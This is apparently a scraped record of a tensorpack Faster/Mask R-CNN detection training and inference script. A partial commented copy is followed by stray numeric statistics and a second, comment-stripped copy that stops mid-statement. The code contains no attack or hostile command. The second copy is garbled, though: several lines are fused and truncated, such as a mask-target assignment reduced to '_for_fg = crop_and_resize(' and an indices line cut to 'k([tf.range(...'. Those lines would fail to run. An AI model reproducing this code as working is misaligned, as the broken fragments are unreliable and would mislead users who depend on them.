decoded_boxes = fastrcnn_head.decoded_output_boxes()
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d, name='fastrcnn_all_boxes')
label_scores = fastrcnn_head.output_scores(name='fastrcnn_all_scores')
final_boxes, final_scores, final_labels = fastrcnn_predictions(
decoded_boxes, label_scores, name_scope='output')
if cfg.MODE_MASK:
roi_resized = roi_align(featuremap, final_boxes * (1.0 / cfg.RPN.ANCHOR_STRIDE), 14)
feature_maskrcnn = resnet_conv5(roi_resized, cfg.BACKBONE.RESNET_NUM_BLOCKS[-1])
mask_logits = maskrcnn_upXconv_head(
'maskrcnn', feature_maskrcnn, cfg.DATA.NUM_CATEGORY, 0) # #result x #cat x 14x14
indices = tf.stack([tf.range(tf.size(final_labels)), tf.cast(final_labels, tf.int32) - 1], axis=1)
final_mask_logits = tf.gather_nd(mask_logits, indices) # #resultx14x14
tf.sigmoid(final_mask_logits, name='output/masks')
return []
class ResNetFPNModel(DetectionModel):
def inputs(self):
ret = [
tf.TensorSpec((None, None, 3), tf.float32, 'image')]
num_anchors = len(cfg.RPN.ANCHOR_RATIOS)
for k in range(len(cfg.FPN.ANCHOR_STRIDES)):
ret.extend([
tf.TensorSpec((None, None, num_anchors), tf.int32,
'anchor_labels_lvl{}'.format(k + 2)),
tf.TensorSpec((None, None, num_anchors, 4), tf.float32,
'anchor_boxes_lvl{}'.format(k + 2))])
ret.extend([
tf.TensorSpec((None, 4), tf.float32, 'gt_boxes'),
tf.TensorSpec((None,), tf.int64, 'gt_labels')]) # all > 0
if cfg.MODE_MASK:
ret.append(
tf.TensorSpec((None, None, None), tf.uint8, 'gt_masks')
) # NR_GT x height x width
return ret
def slice_feature_and_anchors(self, p23456, anchors):
for i, stride in enumerate(cfg.FPN.ANCHOR_STRIDES):
with tf.name_scope('FPN_slice_lvl{}'.format(i)):
anchors[i] = anchors[i].narrow_to(p23456[i])
def backbone(self, image):
c2345 = resnet_fpn_backbone(image, cfg.BACKBONE.RESNET_NUM_BLOCKS)
p23456 = fpn_model('fpn', c2345)
return p23456
def rpn(self, image, features, inputs):
assert len(cfg.RPN.ANCHOR_SIZES) == len(cfg.FPN.ANCHOR_STRIDES)
image_shape2d = tf.shape(image)[2:] # h,w
all_anchors_fpn = get_all_anchors_fpn()
multilevel_anchors = [RPNAnchors(
all_anchors_fpn[i],
inputs['anchor_labels_lvl{}'.format(i + 2)],
inputs['anchor_boxes_lvl{}'.format(i + 2)]) for i in range(len(all_anchors_fpn))]
self.slice_feature_and_anchors(features, multilevel_anchors)
# Multi-Level RPN Proposals
rpn_outputs = [rpn_head('rpn', pi, cfg.FPN.NUM_CHANNEL, len(cfg.RPN.ANCHOR_RATIOS))
for pi in features]
multilevel_label_logits = [k[0] for k in rpn_outputs]
multilevel_box_logits = [k[1] for k in rpn_outputs]
multilevel_pred_boxes = [anchor.decode_logits(logits)
for anchor, logits in zip(multilevel_anchors, multilevel_box_logits)]
proposal_boxes, proposal_scores = generate_fpn_proposals(
multilevel_pred_boxes, multilevel_label_logits, image_shape2d)
if self.training:
losses = multilevel_rpn_losses(
multilevel_anchors, multilevel_label_logits, multilevel_box_logits)
else:
losses = []
return BoxProposals(proposal_boxes), losses
def roi_heads(self, image, features, proposals, targets):
image_shape2d = tf.shape(image)[2:] # h,w
assert len(features) == 5, "Features have to be P23456!"
gt_boxes, gt_labels, *_ = targets
if self.training:
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
fastrcnn_head_func = getattr(model_frcnn, cfg.FPN.FRCNN_HEAD_FUNC)
if not cfg.FPN.CASCADE:
roi_feature_fastrcnn = multilevel_roi_align(features[:4], proposals.boxes, 7)
head_feature = fastrcnn_head_func('fastrcnn', roi_feature_fastrcnn)
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs(
'fastrcnn/outputs', head_feature, cfg.DATA.NUM_CLASS)
fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits,
gt_boxes, tf.constant(cfg.FRCNN.BBOX_REG_WEIGHTS, dtype=tf.float32))
else:
def roi_func(boxes):
return multilevel_roi_align(features[:4], boxes, 7)
fastrcnn_head = CascadeRCNNHead(
proposals, roi_func, fastrcnn_head_func,
(gt_boxes, gt_labels), image_shape2d, cfg.DATA.NUM_CLASS)
if self.training:
all_losses = fastrcnn_head.losses()
if cfg.MODE_MASK:
gt_masks = targets[2]
# maskrcnn loss
roi_feature_maskrcnn = multilevel_roi_align(
features[:4], proposals.fg_boxes(), 14,
name_scope='multilevel_roi_align_mask')
maskrcnn_head_func = getattr(model_mrcnn, cfg.FPN.MRCNN_HEAD_FUNC)
mask_logits = maskrcnn_head_func(
'maskrcnn', roi_feature_maskrcnn, cfg.DATA.NUM_CATEGORY) # #fg x #cat x 28 x 28
target_masks_for_fg = crop_and_resize(
tf.expand_dims(gt_masks, 1),
proposals.fg_boxes(),
proposals.fg_inds_wrt_gt, 28,
pad_border=False) # fg x 1x28x28
target_masks_for_fg = tf.squeeze(target_masks_for_fg, 1, 'sampled_fg_mask_targets')
all_losses.append(maskrcnn_loss(mask_logits, proposals.fg_labels(), target_masks_for_fg))
return all_losses
else:
decoded_boxes = fastrcnn_head.decoded_output_boxes()
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d, name='fastrcnn_all_boxes')
label_scores = fastrcnn_head.output_scores(name='fastrcnn_all_scores')
final_boxes, final_scores, final_labels = fastrcnn_predictions(
decoded_boxes, label_scores, name_scope='output')
if cfg.MODE_MASK:
# Cascade inference needs roi transform with refined boxes.
roi_feature_maskrcnn = multilevel_roi_align(features[:4], final_boxes, 14)
maskrcnn_head_func = getattr(model_mrcnn, cfg.FPN.MRCNN_HEAD_FUNC)
mask_logits = maskrcnn_head_func(
'maskrcnn', roi_feature_maskrcnn, cfg.DATA.NUM_CATEGORY) # #fg x #cat x 28 x 28
indices = tf.stack([tf.range(tf.size(final_labels)), tf.cast(final_labels, tf.int32) - 1], axis=1)
final_mask_logits = tf.gather_nd(mask_logits, indices) # #resultx28x28
tf.sigmoid(final_mask_logits, name='output/masks')
return []
def do_visualize(model, model_path, nr_visualize=100, output_dir='output'):
"""
Visualize some intermediate results (proposals, raw predictions) inside the pipeline.
"""
df = get_train_dataflow() # we don't visualize mask stuff
df.reset_state()
pred = OfflinePredictor(PredictConfig(
model=model,
session_init=get_model_loader(model_path),
input_names=['image', 'gt_boxes', 'gt_labels'],
output_names=[
'generate_{}_proposals/boxes'.format('fpn' if cfg.MODE_FPN else 'rpn'),
'generate_{}_proposals/scores'.format('fpn' if cfg.MODE_FPN else 'rpn'),
'fastrcnn_all_scores',
'output/boxes',
'output/scores',
'output/labels',
]))
if os.path.isdir(output_dir):
shutil.rmtree(output_dir)
utils.fs.mkdir_p(output_dir)
with tqdm.tqdm(total=nr_visualize) as pbar:
for idx, dp in itertools.islice(enumerate(df), nr_visualize):
img, gt_boxes, gt_labels = dp['image'], dp['gt_boxes'], dp['gt_labels']
rpn_boxes, rpn_scores, all_scores, \
final_boxes, final_scores, final_labels = pred(img, gt_boxes, gt_labels)
# draw groundtruth boxes
gt_viz = draw_annotation(img, gt_boxes, gt_labels)
# draw best proposals for each groundtruth, to show recall
proposal_viz, good_proposals_ind = draw_proposal_recall(img, rpn_boxes, rpn_scores, gt_boxes)
# draw the scores for the above proposals
score_viz = draw_predictions(img, rpn_boxes[good_proposals_ind], all_scores[good_proposals_ind])
results = [DetectionResult(*args) for args in
zip(final_boxes, final_scores, final_labels,
[None] * len(final_labels))]
final_viz = draw_final_outputs(img, results)
viz = tpviz.stack_patches([
gt_viz, proposal_viz,
score_viz, final_viz], 2, 2)
if os.environ.get('DISPLAY', None):
tpviz.interactive_imshow(viz)
cv2.imwrite("{}/{:03d}.png".format(output_dir, idx), viz)
pbar.update()
def do_evaluate(pred_config, output_file):
num_gpu = cfg.TRAIN.NUM_GPUS
graph_funcs = MultiTowerOfflinePredictor(
pred_config, list(range(num_gpu))).get_predictors()
for dataset in cfg.DATA.VAL:
logger.info("Evaluating {} ...".format(dataset))
dataflows = [
get_eval_dataflow(dataset, shard=k, num_shards=num_gpu)
for k in range(num_gpu)]
all_results = multithread_predict_dataflow(dataflows, graph_funcs)
output = output_file + '-' + dataset
DetectionDataset().eval_or_save_inference_results(all_results, dataset, output)
def do_predict(pred_func, input_file):
img = cv2.imread(input_file, cv2.IMREAD_COLOR)
results = predict_image(img, pred_func)
final = draw_final_outputs(img, results)
viz = np.concatenate((img, final), axis=1)
cv2.imwrite("output.png", viz)
logger.info("Inference output for {} written to output.png".format(input_file))
tpviz.interactive_imshow(viz)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--load', help='load a model for evaluation or training. Can overwrite BACKBONE.WEIGHTS')
parser.add_argument('--logdir', help='log directory', default='train_log/maskrcnn')
parser.add_argument('--visualize', action='store_true', help='visualize intermediate results')
parser.add_argument('--evaluate', help="Run evaluation. "
"This argument is the path to the output json evaluation file")
parser.add_argument('--predict', help="Run prediction on a given image. "
"This argument is the path to the input image file", nargs='+')
parser.add_argument('--config', help="A list of KEY=VALUE to overwrite those defined in config.py",
nargs='+')
if get_tf_version_tuple() < (1, 6):
# https://github.com/tensorflow/tensorflow/issues/14657
logger.warn("TF<1.6 has a bug which may lead to crash in FasterRCNN if you're unlucky.")
args = parser.parse_args()
if args.config:
cfg.update_args(args.config)
MODEL = ResNetFPNModel() if cfg.MODE_FPN else ResNetC4Model()
DetectionDataset() # initialize the config with information from our dataset
if args.visualize or args.evaluate or args.predict:
if not tf.test.is_gpu_available():
from tensorflow.python.framework import test_util
assert get_tf_version_tuple() >= (1, 7) and test_util.IsMklEnabled(), \
"Inference requires either GPU support or MKL support!"
assert args.load
finalize_configs(is_training=False)
if args.predict or args.visualize:
cfg.TEST.RESULT_SCORE_THRESH = cfg.TEST.RESULT_SCORE_THRESH_VIS
if args.visualize:
do_visualize(MODEL, args.load)
else:
predcfg = PredictConfig(
model=MODEL,
session_init=get_model_loader(args.load),
input_names=MODEL.get_inference_tensor_names()[0],
output_names=MODEL.get_inference_tensor_names()[1])
if args.predict:
predictor = OfflinePredictor(predcfg)
for image_file in args.predict:
do_predict(predictor, image_file)
elif args.evaluate:
assert args.evaluate.endswith('.json'), args.evaluate
do_evaluate(predcfg, args.evaluate)
else:
is_horovod = cfg.TRAINER == 'horovod'
if is_horovod:
hvd.init()
logger.info("Horovod Rank={}, Size={}".format(hvd.rank(), hvd.size()))
if not is_horovod or hvd.rank() == 0:
logger.set_logger_dir(args.logdir, 'd')
logger.info("Environment Information:\n" + collect_env_info())
finalize_configs(is_training=True)
stepnum = cfg.TRAIN.STEPS_PER_EPOCH
# warmup is step based, lr is epoch based
init_lr = cfg.TRAIN.WARMUP_INIT_LR * min(8. / cfg.TRAIN.NUM_GPUS, 1.)
warmup_schedule = [(0, init_lr), (cfg.TRAIN.WARMUP, cfg.TRAIN.BASE_LR)]
warmup_end_epoch = cfg.TRAIN.WARMUP * 1. / stepnum
lr_schedule = [(int(warmup_end_epoch + 0.5), cfg.TRAIN.BASE_LR)]
factor = 8. / cfg.TRAIN.NUM_GPUS
for idx, steps in enumerate(cfg.TRAIN.LR_SCHEDULE[:-1]):
mult = 0.1 ** (idx + 1)
lr_schedule.append(
(steps * factor // stepnum, cfg.TRAIN.BASE_LR * mult))
logger.info("Warm Up Schedule (steps, value): " + str(warmup_schedule))
logger.info("LR Schedule (epochs, value): " + str(lr_schedule))
train_dataflow = get_train_dataflow()
# This is what's commonly referred to as "epochs"
total_passes = cfg.TRAIN.LR_SCHEDULE[-1] * 8 / train_dataflow.size()
logger.info("Total passes of the training set is: {:.5g}".format(total_passes))
callbacks = [
PeriodicCallback(
ModelSaver(max_to_keep=10, keep_checkpoint_every_n_hours=1),
every_k_epochs=20),
# linear warmup
ScheduledHyperParamSetter(
'learning_rate', warmup_schedule, interp='linear', step_based=True),
ScheduledHyperParamSetter('learning_rate', lr_schedule),
PeakMemoryTracker(),
EstimatedTimeLeft(median=True),
SessionRunTimeout(60000).set_chief_only(True), # 1 minute timeout
]
if cfg.TRAIN.EVAL_PERIOD > 0:
callbacks.extend([
EvalCallback(dataset, *MODEL.get_inference_tensor_names(), args.logdir)
for dataset in cfg.DATA.VAL
])
if not is_horovod:
callbacks.append(GPUUtilizationTracker())
if is_horovod and hvd.rank() > 0:
session_init = None
else:
if args.load:
session_init = get_model_loader(args.load)
else:
session_init = get_model_loader(cfg.BACKBONE.WEIGHTS) if cfg.BACKBONE.WEIGHTS else None
traincfg = TrainConfig(
model=MODEL,
data=QueueInput(train_dataflow),
callbacks=callbacks,
steps_per_epoch=stepnum,
max_epoch=cfg.TRAIN.LR_SCHEDULE[-1] * factor // stepnum,
session_init=session_init,
starting_epoch=cfg.TRAIN.STARTING_EPOCH
)
if is_horovod:
trainer = HorovodTrainer(average=False)
else:
# nccl mode appears faster than cpu mode
trainer = SyncMultiGPUTrainerReplicated(cfg.TRAIN.NUM_GPUS, average=False, mode='nccl')
launch_train_with_config(traincfg, trainer)
| 45.183556
| 116
| 0.636791
|
import argparse
import itertools
import numpy as np
import os
import shutil
import cv2
import six
assert six.PY3, "FasterRCNN requires Python 3!"
import tensorflow as tf
import tqdm
import tensorpack.utils.viz as tpviz
from tensorpack import *
from tensorpack.tfutils import optimizer, collect_env_info
from tensorpack.tfutils.common import get_tf_version_tuple
from tensorpack.tfutils.summary import add_moving_summary
import model_frcnn
import model_mrcnn
from basemodel import image_preprocess, resnet_c4_backbone, resnet_conv5, resnet_fpn_backbone
from dataset import DetectionDataset
from config import finalize_configs, config as cfg
from data import get_all_anchors, get_all_anchors_fpn, get_eval_dataflow, get_train_dataflow
from eval import DetectionResult, predict_image, multithread_predict_dataflow, EvalCallback
from model_box import RPNAnchors, clip_boxes, crop_and_resize, roi_align
from model_cascade import CascadeRCNNHead
from model_fpn import fpn_model, generate_fpn_proposals, multilevel_roi_align, multilevel_rpn_losses
from model_frcnn import BoxProposals, FastRCNNHead, fastrcnn_outputs, fastrcnn_predictions, sample_fast_rcnn_targets
from model_mrcnn import maskrcnn_loss, maskrcnn_upXconv_head
from model_rpn import generate_rpn_proposals, rpn_head, rpn_losses
from viz import draw_annotation, draw_final_outputs, draw_predictions, draw_proposal_recall
try:
import horovod.tensorflow as hvd
except ImportError:
pass
class DetectionModel(ModelDesc):
def preprocess(self, image):
image = tf.expand_dims(image, 0)
image = image_preprocess(image, bgr=True)
return tf.transpose(image, [0, 3, 1, 2])
@property
def training(self):
return get_current_tower_context().is_training
def optimizer(self):
lr = tf.get_variable('learning_rate', initializer=0.003, trainable=False)
tf.summary.scalar('learning_rate-summary', lr)
lr = lr / 8.
opt = tf.train.MomentumOptimizer(lr, 0.9)
if cfg.TRAIN.NUM_GPUS < 8:
opt = optimizer.AccumGradOptimizer(opt, 8 // cfg.TRAIN.NUM_GPUS)
return opt
def get_inference_tensor_names(self):
out = ['output/boxes', 'output/scores', 'output/labels']
if cfg.MODE_MASK:
out.append('output/masks')
return ['image'], out
def build_graph(self, *inputs):
inputs = dict(zip(self.input_names, inputs))
image = self.preprocess(inputs['image'])
features = self.backbone(image)
anchor_inputs = {k: v for k, v in inputs.items() if k.startswith('anchor_')}
proposals, rpn_losses = self.rpn(image, features, anchor_inputs)
targets = [inputs[k] for k in ['gt_boxes', 'gt_labels', 'gt_masks'] if k in inputs]
head_losses = self.roi_heads(image, features, proposals, targets)
if self.training:
wd_cost = regularize_cost(
'.*/W', l2_regularizer(cfg.TRAIN.WEIGHT_DECAY), name='wd_cost')
total_cost = tf.add_n(
rpn_losses + head_losses + [wd_cost], 'total_cost')
add_moving_summary(total_cost, wd_cost)
return total_cost
class ResNetC4Model(DetectionModel):
def inputs(self):
ret = [
tf.TensorSpec((None, None, 3), tf.float32, 'image'),
tf.TensorSpec((None, None, cfg.RPN.NUM_ANCHOR), tf.int32, 'anchor_labels'),
tf.TensorSpec((None, None, cfg.RPN.NUM_ANCHOR, 4), tf.float32, 'anchor_boxes'),
tf.TensorSpec((None, 4), tf.float32, 'gt_boxes'),
tf.TensorSpec((None,), tf.int64, 'gt_labels')]
if cfg.MODE_MASK:
ret.append(
tf.TensorSpec((None, None, None), tf.uint8, 'gt_masks')
)
return ret
def backbone(self, image):
return [resnet_c4_backbone(image, cfg.BACKBONE.RESNET_NUM_BLOCKS[:3])]
def rpn(self, image, features, inputs):
featuremap = features[0]
rpn_label_logits, rpn_box_logits = rpn_head('rpn', featuremap, cfg.RPN.HEAD_DIM, cfg.RPN.NUM_ANCHOR)
anchors = RPNAnchors(get_all_anchors(), inputs['anchor_labels'], inputs['anchor_boxes'])
anchors = anchors.narrow_to(featuremap)
image_shape2d = tf.shape(image)[2:]
pred_boxes_decoded = anchors.decode_logits(rpn_box_logits)
proposal_boxes, proposal_scores = generate_rpn_proposals(
tf.reshape(pred_boxes_decoded, [-1, 4]),
tf.reshape(rpn_label_logits, [-1]),
image_shape2d,
cfg.RPN.TRAIN_PRE_NMS_TOPK if self.training else cfg.RPN.TEST_PRE_NMS_TOPK,
cfg.RPN.TRAIN_POST_NMS_TOPK if self.training else cfg.RPN.TEST_POST_NMS_TOPK)
if self.training:
losses = rpn_losses(
anchors.gt_labels, anchors.encoded_gt_boxes(), rpn_label_logits, rpn_box_logits)
else:
losses = []
return BoxProposals(proposal_boxes), losses
def roi_heads(self, image, features, proposals, targets):
image_shape2d = tf.shape(image)[2:]
featuremap = features[0]
gt_boxes, gt_labels, *_ = targets
if self.training:
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
boxes_on_featuremap = proposals.boxes * (1.0 / cfg.RPN.ANCHOR_STRIDE)
roi_resized = roi_align(featuremap, boxes_on_featuremap, 14)
feature_fastrcnn = resnet_conv5(roi_resized, cfg.BACKBONE.RESNET_NUM_BLOCKS[-1])
feature_gap = GlobalAvgPooling('gap', feature_fastrcnn, data_format='channels_first')
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs('fastrcnn', feature_gap, cfg.DATA.NUM_CLASS)
fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits, gt_boxes,
tf.constant(cfg.FRCNN.BBOX_REG_WEIGHTS, dtype=tf.float32))
if self.training:
all_losses = fastrcnn_head.losses()
if cfg.MODE_MASK:
gt_masks = targets[2]
fg_feature = tf.gather(feature_fastrcnn, proposals.fg_inds())
mask_logits = maskrcnn_upXconv_head(
'maskrcnn', fg_feature, cfg.DATA.NUM_CATEGORY, num_convs=0) _for_fg = crop_and_resize(
tf.expand_dims(gt_masks, 1),
proposals.fg_boxes(),
proposals.fg_inds_wrt_gt, 14,
pad_border=False)
target_masks_for_fg = tf.squeeze(target_masks_for_fg, 1, 'sampled_fg_mask_targets')
all_losses.append(maskrcnn_loss(mask_logits, proposals.fg_labels(), target_masks_for_fg))
return all_losses
else:
decoded_boxes = fastrcnn_head.decoded_output_boxes()
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d, name='fastrcnn_all_boxes')
label_scores = fastrcnn_head.output_scores(name='fastrcnn_all_scores')
final_boxes, final_scores, final_labels = fastrcnn_predictions(
decoded_boxes, label_scores, name_scope='output')
if cfg.MODE_MASK:
roi_resized = roi_align(featuremap, final_boxes * (1.0 / cfg.RPN.ANCHOR_STRIDE), 14)
feature_maskrcnn = resnet_conv5(roi_resized, cfg.BACKBONE.RESNET_NUM_BLOCKS[-1])
mask_logits = maskrcnn_upXconv_head(
'maskrcnn', feature_maskrcnn, cfg.DATA.NUM_CATEGORY, 0) k([tf.range(tf.size(final_labels)), tf.cast(final_labels, tf.int32) - 1], axis=1)
final_mask_logits = tf.gather_nd(mask_logits, indices) tf.sigmoid(final_mask_logits, name='output/masks')
return []
class ResNetFPNModel(DetectionModel):
def inputs(self):
ret = [
tf.TensorSpec((None, None, 3), tf.float32, 'image')]
num_anchors = len(cfg.RPN.ANCHOR_RATIOS)
for k in range(len(cfg.FPN.ANCHOR_STRIDES)):
ret.extend([
tf.TensorSpec((None, None, num_anchors), tf.int32,
'anchor_labels_lvl{}'.format(k + 2)),
tf.TensorSpec((None, None, num_anchors, 4), tf.float32,
'anchor_boxes_lvl{}'.format(k + 2))])
ret.extend([
tf.TensorSpec((None, 4), tf.float32, 'gt_boxes'),
tf.TensorSpec((None,), tf.int64, 'gt_labels')])
if cfg.MODE_MASK:
ret.append(
tf.TensorSpec((None, None, None), tf.uint8, 'gt_masks')
)
return ret
def slice_feature_and_anchors(self, p23456, anchors):
for i, stride in enumerate(cfg.FPN.ANCHOR_STRIDES):
with tf.name_scope('FPN_slice_lvl{}'.format(i)):
anchors[i] = anchors[i].narrow_to(p23456[i])
def backbone(self, image):
c2345 = resnet_fpn_backbone(image, cfg.BACKBONE.RESNET_NUM_BLOCKS)
p23456 = fpn_model('fpn', c2345)
return p23456
def rpn(self, image, features, inputs):
assert len(cfg.RPN.ANCHOR_SIZES) == len(cfg.FPN.ANCHOR_STRIDES)
image_shape2d = tf.shape(image)[2:]
all_anchors_fpn = get_all_anchors_fpn()
multilevel_anchors = [RPNAnchors(
all_anchors_fpn[i],
inputs['anchor_labels_lvl{}'.format(i + 2)],
inputs['anchor_boxes_lvl{}'.format(i + 2)]) for i in range(len(all_anchors_fpn))]
self.slice_feature_and_anchors(features, multilevel_anchors)
rpn_outputs = [rpn_head('rpn', pi, cfg.FPN.NUM_CHANNEL, len(cfg.RPN.ANCHOR_RATIOS))
for pi in features]
multilevel_label_logits = [k[0] for k in rpn_outputs]
multilevel_box_logits = [k[1] for k in rpn_outputs]
multilevel_pred_boxes = [anchor.decode_logits(logits)
for anchor, logits in zip(multilevel_anchors, multilevel_box_logits)]
proposal_boxes, proposal_scores = generate_fpn_proposals(
multilevel_pred_boxes, multilevel_label_logits, image_shape2d)
if self.training:
losses = multilevel_rpn_losses(
multilevel_anchors, multilevel_label_logits, multilevel_box_logits)
else:
losses = []
return BoxProposals(proposal_boxes), losses
def roi_heads(self, image, features, proposals, targets):
image_shape2d = tf.shape(image)[2:]
assert len(features) == 5, "Features have to be P23456!"
gt_boxes, gt_labels, *_ = targets
if self.training:
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
fastrcnn_head_func = getattr(model_frcnn, cfg.FPN.FRCNN_HEAD_FUNC)
if not cfg.FPN.CASCADE:
roi_feature_fastrcnn = multilevel_roi_align(features[:4], proposals.boxes, 7)
head_feature = fastrcnn_head_func('fastrcnn', roi_feature_fastrcnn)
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs(
'fastrcnn/outputs', head_feature, cfg.DATA.NUM_CLASS)
fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits,
gt_boxes, tf.constant(cfg.FRCNN.BBOX_REG_WEIGHTS, dtype=tf.float32))
else:
def roi_func(boxes):
return multilevel_roi_align(features[:4], boxes, 7)
fastrcnn_head = CascadeRCNNHead(
proposals, roi_func, fastrcnn_head_func,
(gt_boxes, gt_labels), image_shape2d, cfg.DATA.NUM_CLASS)
if self.training:
all_losses = fastrcnn_head.losses()
if cfg.MODE_MASK:
gt_masks = targets[2]
roi_feature_maskrcnn = multilevel_roi_align(
features[:4], proposals.fg_boxes(), 14,
name_scope='multilevel_roi_align_mask')
maskrcnn_head_func = getattr(model_mrcnn, cfg.FPN.MRCNN_HEAD_FUNC)
mask_logits = maskrcnn_head_func(
'maskrcnn', roi_feature_maskrcnn, cfg.DATA.NUM_CATEGORY) _fg = crop_and_resize(
tf.expand_dims(gt_masks, 1),
proposals.fg_boxes(),
proposals.fg_inds_wrt_gt, 28,
pad_border=False)
target_masks_for_fg = tf.squeeze(target_masks_for_fg, 1, 'sampled_fg_mask_targets')
all_losses.append(maskrcnn_loss(mask_logits, proposals.fg_labels(), target_masks_for_fg))
return all_losses
else:
decoded_boxes = fastrcnn_head.decoded_output_boxes()
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d, name='fastrcnn_all_boxes')
label_scores = fastrcnn_head.output_scores(name='fastrcnn_all_scores')
final_boxes, final_scores, final_labels = fastrcnn_predictions(
decoded_boxes, label_scores, name_scope='output')
if cfg.MODE_MASK:
roi_feature_maskrcnn = multilevel_roi_align(features[:4], final_boxes, 14)
maskrcnn_head_func = getattr(model_mrcnn, cfg.FPN.MRCNN_HEAD_FUNC)
mask_logits = maskrcnn_head_func(
'maskrcnn', roi_feature_maskrcnn, cfg.DATA.NUM_CATEGORY) k([tf.range(tf.size(final_labels)), tf.cast(final_labels, tf.int32) - 1], axis=1)
final_mask_logits = tf.gather_nd(mask_logits, indices) tf.sigmoid(final_mask_logits, name='output/masks')
return []
def do_visualize(model, model_path, nr_visualize=100, output_dir='output'):
df = get_train_dataflow()
df.reset_state()
pred = OfflinePredictor(PredictConfig(
model=model,
session_init=get_model_loader(model_path),
input_names=['image', 'gt_boxes', 'gt_labels'],
output_names=[
'generate_{}_proposals/boxes'.format('fpn' if cfg.MODE_FPN else 'rpn'),
'generate_{}_proposals/scores'.format('fpn' if cfg.MODE_FPN else 'rpn'),
'fastrcnn_all_scores',
'output/boxes',
'output/scores',
'output/labels',
]))
if os.path.isdir(output_dir):
shutil.rmtree(output_dir)
utils.fs.mkdir_p(output_dir)
with tqdm.tqdm(total=nr_visualize) as pbar:
for idx, dp in itertools.islice(enumerate(df), nr_visualize):
img, gt_boxes, gt_labels = dp['image'], dp['gt_boxes'], dp['gt_labels']
rpn_boxes, rpn_scores, all_scores, \
final_boxes, final_scores, final_labels = pred(img, gt_boxes, gt_labels)
# draw groundtruth boxes
gt_viz = draw_annotation(img, gt_boxes, gt_labels)
# draw best proposals for each groundtruth, to show recall
proposal_viz, good_proposals_ind = draw_proposal_recall(img, rpn_boxes, rpn_scores, gt_boxes)
# draw the scores for the above proposals
score_viz = draw_predictions(img, rpn_boxes[good_proposals_ind], all_scores[good_proposals_ind])
results = [DetectionResult(*args) for args in
zip(final_boxes, final_scores, final_labels,
[None] * len(final_labels))]
final_viz = draw_final_outputs(img, results)
viz = tpviz.stack_patches([
gt_viz, proposal_viz,
score_viz, final_viz], 2, 2)
if os.environ.get('DISPLAY', None):
tpviz.interactive_imshow(viz)
cv2.imwrite("{}/{:03d}.png".format(output_dir, idx), viz)
pbar.update()
def do_evaluate(pred_config, output_file):
num_gpu = cfg.TRAIN.NUM_GPUS
graph_funcs = MultiTowerOfflinePredictor(
pred_config, list(range(num_gpu))).get_predictors()
for dataset in cfg.DATA.VAL:
logger.info("Evaluating {} ...".format(dataset))
dataflows = [
get_eval_dataflow(dataset, shard=k, num_shards=num_gpu)
for k in range(num_gpu)]
all_results = multithread_predict_dataflow(dataflows, graph_funcs)
output = output_file + '-' + dataset
DetectionDataset().eval_or_save_inference_results(all_results, dataset, output)
def do_predict(pred_func, input_file):
img = cv2.imread(input_file, cv2.IMREAD_COLOR)
results = predict_image(img, pred_func)
final = draw_final_outputs(img, results)
viz = np.concatenate((img, final), axis=1)
cv2.imwrite("output.png", viz)
logger.info("Inference output for {} written to output.png".format(input_file))
tpviz.interactive_imshow(viz)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--load', help='load a model for evaluation or training. Can overwrite BACKBONE.WEIGHTS')
parser.add_argument('--logdir', help='log directory', default='train_log/maskrcnn')
parser.add_argument('--visualize', action='store_true', help='visualize intermediate results')
parser.add_argument('--evaluate', help="Run evaluation. "
"This argument is the path to the output json evaluation file")
parser.add_argument('--predict', help="Run prediction on a given image. "
"This argument is the path to the input image file", nargs='+')
parser.add_argument('--config', help="A list of KEY=VALUE to overwrite those defined in config.py",
nargs='+')
if get_tf_version_tuple() < (1, 6):
# https://github.com/tensorflow/tensorflow/issues/14657
logger.warn("TF<1.6 has a bug which may lead to crash in FasterRCNN if you're unlucky.")
args = parser.parse_args()
if args.config:
cfg.update_args(args.config)
MODEL = ResNetFPNModel() if cfg.MODE_FPN else ResNetC4Model()
DetectionDataset()
if args.visualize or args.evaluate or args.predict:
if not tf.test.is_gpu_available():
from tensorflow.python.framework import test_util
assert get_tf_version_tuple() >= (1, 7) and test_util.IsMklEnabled(), \
"Inference requires either GPU support or MKL support!"
assert args.load
finalize_configs(is_training=False)
if args.predict or args.visualize:
cfg.TEST.RESULT_SCORE_THRESH = cfg.TEST.RESULT_SCORE_THRESH_VIS
if args.visualize:
do_visualize(MODEL, args.load)
else:
predcfg = PredictConfig(
model=MODEL,
session_init=get_model_loader(args.load),
input_names=MODEL.get_inference_tensor_names()[0],
output_names=MODEL.get_inference_tensor_names()[1])
if args.predict:
predictor = OfflinePredictor(predcfg)
for image_file in args.predict:
do_predict(predictor, image_file)
elif args.evaluate:
assert args.evaluate.endswith('.json'), args.evaluate
do_evaluate(predcfg, args.evaluate)
else:
is_horovod = cfg.TRAINER == 'horovod'
if is_horovod:
hvd.init()
logger.info("Horovod Rank={}, Size={}".format(hvd.rank(), hvd.size()))
if not is_horovod or hvd.rank() == 0:
logger.set_logger_dir(args.logdir, 'd')
logger.info("Environment Information:\n" + collect_env_info())
finalize_configs(is_training=True)
stepnum = cfg.TRAIN.STEPS_PER_EPOCH
init_lr = cfg.TRAIN.WARMUP_INIT_LR * min(8. / cfg.TRAIN.NUM_GPUS, 1.)
warmup_schedule = [(0, init_lr), (cfg.TRAIN.WARMUP, cfg.TRAIN.BASE_LR)]
warmup_end_epoch = cfg.TRAIN.WARMUP * 1. / stepnum
lr_schedule = [(int(warmup_end_epoch + 0.5), cfg.TRAIN.BASE_LR)]
factor = 8. / cfg.TRAIN.NUM_GPUS
for idx, steps in enumerate(cfg.TRAIN.LR_SCHEDULE[:-1]):
mult = 0.1 ** (idx + 1)
lr_schedule.append(
